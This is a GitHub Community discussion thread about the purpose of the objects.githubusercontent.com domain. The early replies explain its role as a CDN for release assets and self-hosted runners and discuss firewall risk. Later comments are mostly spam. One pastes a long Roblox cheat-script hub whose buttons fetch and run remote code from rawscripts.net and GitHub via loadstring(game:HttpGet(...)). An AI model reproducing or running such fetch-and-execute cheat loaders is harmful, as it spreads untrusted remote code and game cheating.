### DISCUSSION TITLE
objects.githubusercontent.com

### DISCUSSION THREAD

**Discussion by ghefler** [community/community#58455] [Other Feature Feedback, Questions, & Ideas] [answered]
### Select Topic Area

Question

### Body

Hi,

I'm trying to find more information regarding the purpose `objects.githubusercontent.com` without much success, my only clue is that it's used in [self hosted agents](https://docs.github.com/en/actions/hosting-your-own-runners/managing-self-hosted-runners/about-self-hosted-runners)?

does anyone else has more info on its purpose? I understand that raw.githubusercontent.com is used to deliver  unprocessed versions of files hosted in a repo.

If anyone has further information that would be deeply appreciated!

Thanks

**Comment by the-officialjosh** [comment]
I can provide some information regarding the purpose of `objects.githubusercontent.com`. This domain is indeed used by self-hosted agents in GitHub workflows. It serves as a storage location for certain artefacts and objects that are required during the execution of workflows. When using self-hosted agents, GitHub needs a reliable way to distribute files and data to those agents. `objects.githubusercontent.com` acts as a content delivery network (CDN) for delivering necessary resources to self-hosted agents, ensuring efficient and reliable access to artefacts and objects needed for the workflows to run successfully. While `raw.githubusercontent.com` is commonly used to access raw versions of files in a repository, `objects.githubusercontent.com` focuses specifically on providing resources for self-hosted agents. If anyone has additional insights or more detailed information on the purpose of `objects.githubusercontent.com`, it would be great to hear from them. I hope this helps clarify the role and purpose of `objects.githubusercontent.com` in GitHub workflows. If you have any further questions, feel free to ask!

**Reply by ghefler** [reply]
thanks @the-officialjosh! is there any GitHub documentation to support on this (beyond the link I posted)?

**Reply by the-officialjosh** [reply, marked as answer]
I had help from going through these. They might not be very helpful but you could look at them -  [Github Issue](https://github.com/github/docs/issues/8031)
[Stack Overflow](https://stackoverflow.com/questions/39065921/what-do-raw-githubusercontent-com-urls-represent)
[Intellipaat](https://intellipaat.com/community/21118/githubusercontent-what-do-raw-githubusercontent-com-urls-represent)

**Reply by akamel2025** [reply]
> n GitHub workflows. If you

From cybersecurity point of view, is it secure to enable it in our environment? I can see that this URL is reported for malicious content : 
![image](https://github.com/user-attachments/assets/b14b199c-a967-47c2-967f-13e5e622108c)

**Reply by ghefler** [reply]
githubusercontent can be abused to deliver malware so it's important to keep track of what content is being downloaded. I would only enable access to that domain on a need to basis.

**Reply by dorisbebwa-lab** [reply]
I need scripts

**Comment by Samit4s** [comment]
hi

**Reply by hrickofilip2-creator** [reply]
Cau

**Comment by mamad6850** [comment]
warp://CleanIP?ifp=40-80&ifps=40%0A-100&ifpd=4-8&ifpm=m4#PewezaVPN

**Comment by Luca102772** [comment]
Pls can you make Script

**Reply by RaeesAhmad052** [reply]
explain what you want?

**Reply by dorisbebwa-lab** [reply]
I want to be a gawker un roblox rivals

**Reply by dorisbebwa-lab** [reply]
Hacker

**Reply by Interst311ar** [reply]
who do you think you are

**Comment by Lord-shaban** [comment]
It looks like `objects.githubusercontent.com` is part of GitHub’s content delivery infrastructure — similar to other `*.githubusercontent.com` domains (like `raw.githubusercontent.com`).

Here’s what’s known about its purpose:

* **Purpose:** It serves as an object storage or CDN endpoint for GitHub to deliver *large binary files, release assets, artifacts, and tool distributions*.
* **How it works:** When you download a release asset or artifact (for example, via `github.com/.../releases/download/...`), GitHub issues a redirect to a *signed, time-limited* URL under `objects.githubusercontent.com`. These signed URLs help GitHub control access and caching.
* **Relation to self-hosted agents:** In CI/CD environments, especially with *self-hosted runners*, GitHub Actions workflows often fetch dependencies, actions, or artifacts from this domain. That’s why many firewall or proxy setups must explicitly allow outbound access to `objects.githubusercontent.com` for workflows to run successfully.
* **Difference from raw.githubusercontent.com:**

  * `raw.githubusercontent.com` → serves static raw text files directly from repos.
  * `objects.githubusercontent.com` → serves large binary or release-type objects, usually through signed redirects.
* **Practical note:** Some users have reported pipeline failures or “authorization required” errors when this domain is blocked, since URLs are signed and expire over time.

In short, `objects.githubusercontent.com` is GitHub’s managed CDN/object store for binary and release content, critical for Actions and self-hosted runner operations.

**Comment by khisidbi4hri49-wq** [comment]
local OrionLib = loadstring(game:HttpGet(('https://raw.githubusercontent.com/jensonhirst/Orion/main/source')))()
local Window = OrionLib:MakeWindow({Name = "Blood hup", HidePremium = false, SaveConfig = true, ConfigFolder = "OrionTest"})

--[[
Name = <string> - The name of the UI.
HidePremium = <bool> - Whether or not the user details shows Premium status or not.
SaveConfig = <bool> - Toggles the config saving in the UI.
ConfigFolder = <string> - The name of the folder where the configs are saved.
IntroEnabled = <bool> - Whether or not to show the intro animation.
IntroText = <string> - Text to show in the intro animation.
IntroIcon = <string> - URL to the image you want to use in the intro animation.
Icon = <string> - URL to the image you want displayed on the window.
CloseCallback = <function> - Function to execute when the window is closed.
]]
local Tab = Window:MakeTab({
	Name = "البدايه",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})

--[[
Name = <string> - The name of the tab.
Icon = <string> - The icon of the tab.
PremiumOnly = <bool> - Makes the tab accessible to Sirus Premium users only.
]]
Tab:AddButton({
	Name = "مطور السكربت : نور",
	Callback = function()
      		print("button pressed")
  	end    
})

--[[
Name = <string> - The name of the button.
Callback = <function> - The function of the button.
]]
local Tab = Window:MakeTab({
	Name = "سكربتات فعاليات رسم العرب",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})

--[[
Name = <string> - The name of the tab.
Icon = <string> - The icon of the tab.
PremiumOnly = <bool> - Makes the tab accessible to Sirus Premium users only.
]]
Tab:AddButton({
	Name = "MOLYN",
	Callback = function()
      		loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-MOLYN-DEVELOPMENT-63669"))()
  	end    
})

--[[
Name = <string> - The name of the button.
Callback = <function> - The function of the button.
]]
Tab:AddButton({
	Name = "SCN HUP",
	Callback = function()
      		loadstring(game:HttpGet("https://rawscripts.net/raw/faalyat-rsm-llarb-or-thdyth-alshat-All-kinds-of-killing-61376"))()
  	end    
})

--[[
Name = <string> - The name of the button.
Callback = <function> - The function of the button.
]]
Tab:AddButton({
	Name = "Oblivynx",
	Callback = function()
      		loadstring(game:HttpGet("https://rawscripts.net/raw/faalyat-rsm-llarb-OblivynX-50294"))()
  	end    
})

--[[
Name = <string> - The name of the button.
Callback = <function> - The function of the button.
]]
Tab:AddButton({
	Name = "LORLN",
	Callback = function()
      		loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-LORLN-PRO-Update-48070"))()
  	end    
})

--[[
Name = <string> - The name of the button.
Callback = <function> - The function of the button.
]]
Tab:AddButton({
	Name = "vr7",
	Callback = function()
      		loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-VR7-45290"))()
  	end    
})

--[[
Name = <string> - The name of the button.
Callback = <function> - The function of the button.
]]
local Tab = Window:MakeTab({
	Name = "سكربتات ماب بيوت",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})

--[[
Name = <string> - The name of the tab.
Icon = <string> - The icon of the tab.
PremiumOnly = <bool> - Makes the tab accessible to Sirus Premium users only.
]]
Tab:AddButton({
	Name = "jeon",
	Callback = function()
      		loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-Jeon-Hub-85964"))()
  	end    
})

--[[
Name = <string> - The name of the button.
Callback = <function> - The function of the button.
]]
Tab:AddButton({
	Name = "LEON",
	Callback = function()
      		loadstring(game:HttpGet("https://rawscripts.net/raw/Brookhaven-RP-LEON-Hub-51619"))()
  	end    
})

--[[
Name = <string> - The name of the button.
Callback = <function> - The function of the button.
]]
Tab:AddButton({
	Name = "ice",
	Callback = function()
      		loadstring(game:HttpGet("https://rawscripts.net/raw/Brookhaven-RP-ICE-HUB-UPDATE-85817"))()
  	end    
})

--[[
Name = <string> - The name of the button.
Callback = <function> - The function of the button.
]]
Tab:AddButton({
	Name = "ugix+Tokyo",
	Callback = function()
      		loadstring(game:HttpGet("https://rawscripts.net/raw/Brookhaven-RP-UgiX-Tokyo-46804"))()
  	end    
})

--[[
Name = <string> - The name of the button.
Callback = <function> - The function of the button.
]]
Tab:AddButton({
	Name = "BRUTON",
	Callback = function()
      		loadstring(game:HttpGet("https://rawscripts.net/raw/Brookhaven-RP-BRUTON-HUB-New-update-78250"))()
  	end    
})

--[[
Name = <string> - The name of the button.
Callback = <function> - The function of the button.
]]
Tab:AddButton({
	Name = "Drip Client Open Source",
	Callback = function()
      		loadstring(game:HttpGet("https://rawscripts.net/raw/Brookhaven-RP-Drip-Client-Open-Source-75145"))()
  	end    
})

--[[
Name = <string> - The name of the button.
Callback = <function> - The function of the button.
]]
Tab:AddButton({
	Name = "s7 hup",
	Callback = function()
      		loadstring(game:HttpGet("https://rawscripts.net/raw/Brookhaven-RP-S7-hub-30753"))()
  	end    
})

--[[
Name = <string> - The name of the button.
Callback = <function> - The function of the button.
]]
Tab:AddButton({
	Name = "ALFA",
	Callback = function()
      		loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-ALFA-IRAQ-34036"))()
  	end    
})

--[[
Name = <string> - The name of the button.
Callback = <function> - The function of the button.
]]
local Tab = Window:MakeTab({
	Name = "سكربتات بلوكس فروت",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})

--[[
Name = <string> - The name of the tab.
Icon = <string> - The icon of the tab.
PremiumOnly = <bool> - Makes the tab accessible to Sirus Premium users only.
]]
Tab:AddButton({
	Name = "redz",
	Callback = function()
      		loadstring(game:HttpGet("https://raw.githubusercontent.com/tlredz/Scripts/refs/heads/main/main.luau"))()
  	end    
})

--[[
Name = <string> - The name of the button.
Callback = <function> - The function of the button.
]]
Tab:AddButton({
	Name = "9ver",
	Callback = function()
      		loadstring(game:HttpGet("https://rawscripts.net/raw/Brookhaven-RP-9VER-IRAQ-25365"))()
  	end    
})

--[[
Name = <string> - The name of the button.
Callback = <function> - The function of the button.
]]
local Tab = Window:MakeTab({
	Name = "بلوكس فروت",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})

--[[
Name = <string> - The name of the tab.
Icon = <string> - The icon of the tab.
PremiumOnly = <bool> - Makes the tab accessible to Sirus Premium users only.
]]

**Comment by SecurityTalent** [comment]
<img width="1716" height="796" alt="PHP Malware Analysis" src="https://github.com/user-attachments/assets/120cbc59-63d2-44f5-b186-8d83de3d8cdf" />
<img width="1919" height="949" alt="Virustotal PHP Malware Analysis" src="https://github.com/user-attachments/assets/cec47535-5583-4285-a4d9-b69e792d99ff" />

Malware Analysis Report 
https://github.com/SecurityTalent/Malware-Analysis

**Comment by Interst311ar** [comment]
Guys wth is going on 🥀

[a comment by an automated account is not shown]

**Comment by alannec525-sys** [comment]
Oi
